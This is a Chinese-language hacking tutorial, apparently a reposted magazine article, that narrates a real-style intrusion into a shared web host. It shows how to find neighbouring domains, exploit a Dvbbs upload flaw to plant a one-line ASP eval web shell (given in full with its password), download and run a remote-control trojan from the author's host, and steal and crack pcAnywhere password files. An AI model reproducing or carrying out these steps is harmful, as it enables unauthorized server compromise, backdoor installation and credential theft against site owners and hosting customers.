拐弯入侵虚拟主机

前段时间动网的Upfile.asp文档上传漏洞闹地沸沸扬扬，很多朋友可能利用这个漏洞得到了不少WebShell，我也利用他搞到了很多的WebShell，可是由于事情比较多，没能对已放置了WebShell的虚拟主机进一步深入，现在空了，赶紧拿出了以前放置的WebShell……

TIPS：动网的Upfile.asp文档上传漏洞能够上传任何文档至服务器。凶器是ASP木马（如海阳顶端网ASP木马，冰河浪子微型ASP木马等），利用上传漏洞上传这些小巧而功能强大的ASP木马来入侵服务器。由于ASP是一种动态网页解析技术，加上黑客往往会破坏数据库造成整个论坛瘫痪、数据丢失，事后，要查出入侵者的IP也是很麻烦的事。黑防前几期已有很周详的介绍，大家能够翻看以往的杂志。

我的这些肉鸡列表中，就数www.***.com网站最大，浏览量最高，要搞就搞大的。可惜这个网站的WebShell早已被发现并删除了，我来看看有别的方法进去没有。
在网站上转了几圈，发现该网站的动网论坛已由低版本升级到了最新的7.0 sp2，完全杜绝了上传漏洞，而且这个网站的整站程式是由后台动态页面产生前台静态HTML页面，根本没有SQL注射的机会，转来转去还是一无所获！拿起扫描器，对这台主机进行了一番扫描，结果就发现了几个常见端口，几乎没有利用的可能。徘徊了好长时间，我还是别死钻牛角，想点别的办法来入侵吧！
既然正面来不行，那我就拐弯搞一次。据我估计，这个网站所在的主机一定是台虚拟主机，提供WEB空间出售，其中肯定更有别的网站，而这些网站十有八九存在当前最热门的动网论坛，嘿嘿！假如存在动网论坛是7.0 sp2以下的版本，那么就能够上传ASP木马，然后……越想越带劲，抓紧时间干。

TIPS：2004年第八期黑防上开始出现以“旁注”为内容的文章，实际上就是利用虚拟主机的特点，先利用注入漏洞入侵同一服务器上目标站点“旁边”的主机，然后再迂回攻击目标，这样的入侵路在最近的网络攻击事件中很盛行。

步骤1：探测虚拟主机中的其他网站
要探测虚拟主机中的其他网站，在有些朋友看来好象有点不可能。其实只要借助这个网站：http://whois.webhosting.info就能够了！他是一家提供高级WHOIS服务的网站，能够对域名，IP等进行WHOIS查询，从而发现其中的大量信息。

TIPS：WHOIS服务是查询目标IP上有多少个域名指向，并且能查出这些域名的周详注册信息。这里给大家推荐一款小工具，很方便而且整合了很多相关功能：桂林老兵网络信息综合查询工具，本期光盘有收录，大家能够试试他的功能。

我来对目标主机http://www.xx.com进行探测一下，在“Enter a domain name or an IP Address in the search box below:”中填写地址：http://www.***.com再查询，能够看到查到了这个主机上存在75个域名开放的情况（如图1所示），呵呵！看来这个空间主机还赚了不少钱呢！

打开这75个域名进行浏览，果然发现其中一个网站www.yyy.com存在一个低版本的动网论坛，这下好办了，开始上传ASP木马！

步骤2：上传ASP木马
动网文档上传漏洞的相关工具很多，我这里用浪客联盟的工具：DVbbs Exploit。在URL中填写上传文档的具体URL地址：www.yyy.com/bbs/upfile.asp,上传路径中填写“data（即保存论坛数据库的文档夹）”，在文档名填写1.asp，然后在木马内容中复制冰狐浪子网页木马的内容：<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('heidan') '')</SCRIPT>，注意：“heidan”是我配置的连接密码，如图2所示。

上传成功后，得到的木马地址是：www.yyy.com/bbs/data/1.asp.
步骤三，系统探测
已成功上传了冰狐浪子网页后门，那么来探测一下这台主机的基本情况吧！打开控制页面Icyfox007.htm，填写木马地址www.yyy.com/bbs/data/1.asp.和密码“heidan”进行简单的探测。发现该主机存在5个盘，D盘存在客户网站资料，已被NTFS严格限制权限，无法浏览。而F盘是系统盘，由于管理员不太重视，所以ASP后门对他有写，读等权限！那我就不客气了，向虚拟主机的主机权限进发！
我配置了一个灰鸽子服务器端Server.exe，上传到我的网站http://zzz.com下，得到下载地址Http://zzz.com/server.exe，下面来把他上传到主机上。使用冰狐浪子网页后门的上传文档功能，在“Input URL”中填写木马的下载地址http://zzz.com/server.exe，在“Input Path”中填写本地生成的具体路径名：c:/1.exe，提示上传功能！再利用冰狐浪子网页后门的运行程式功能，在“Input Path”中填写木马的路径c:/，在“Input Name”中填写木马名1.exe，然后运行！等了好长一会时间，提示：运行失败！没看错吧？我又尝试运行了几次，都是提示运行失败！
没办法，换个后门试试，又尝试上传了几个别的后门程式，结果都提示运行失败，看来十有八九这台主机安装了很厉害的杀毒软件。经过后门的“环境探测”，证实了我的猜想，果然在F盘下发现了KV2003的字眼，难怪！
但是同时也验证了那句老话：山穷水尽疑无路，柳暗花明又一村。因为我同时看见在KV2003旁边出现了字眼：f:/ Program Files/Symantec/pcAnywhere（如图3所示），这是远程管理软件PcAnywhere的安装路径。只要把PcAnywhere的密码文档得到，进行破解，那么就能够顺利的拿下这台主机了！

步骤4：下载密码文档并破解
PcAnywhere的密码文档是以“cif”结尾的，通常保存在f:/Program Files/Symantec/pcAnywhere下。但这样不太好找，有个小诀窍，只要进入到f:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/下，即可轻松发现密码文档。我利用冰狐浪子网页后门的“浏览目录”功能进入到其路径下，果然发现了“cif”密码文档，再利用冰狐浪子网页后门的下载功能，顺利将其下载到本地文档夹中（如图4所示）。幸亏管理员配置的系统F盘可操作，否则这次提升权限的操作可就失败了。

破解Pcanywhere密码的工具很多，例如PcAnyWhereCrack，PcanywherePWD等等，我比较喜欢PcanywherePWD，图像化界面，很容易上手。打开PcanywherePWD，选择下载到的密码文档，点“解密”，即可得到Pcanywhere的用户名和密码，如图5所示。

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!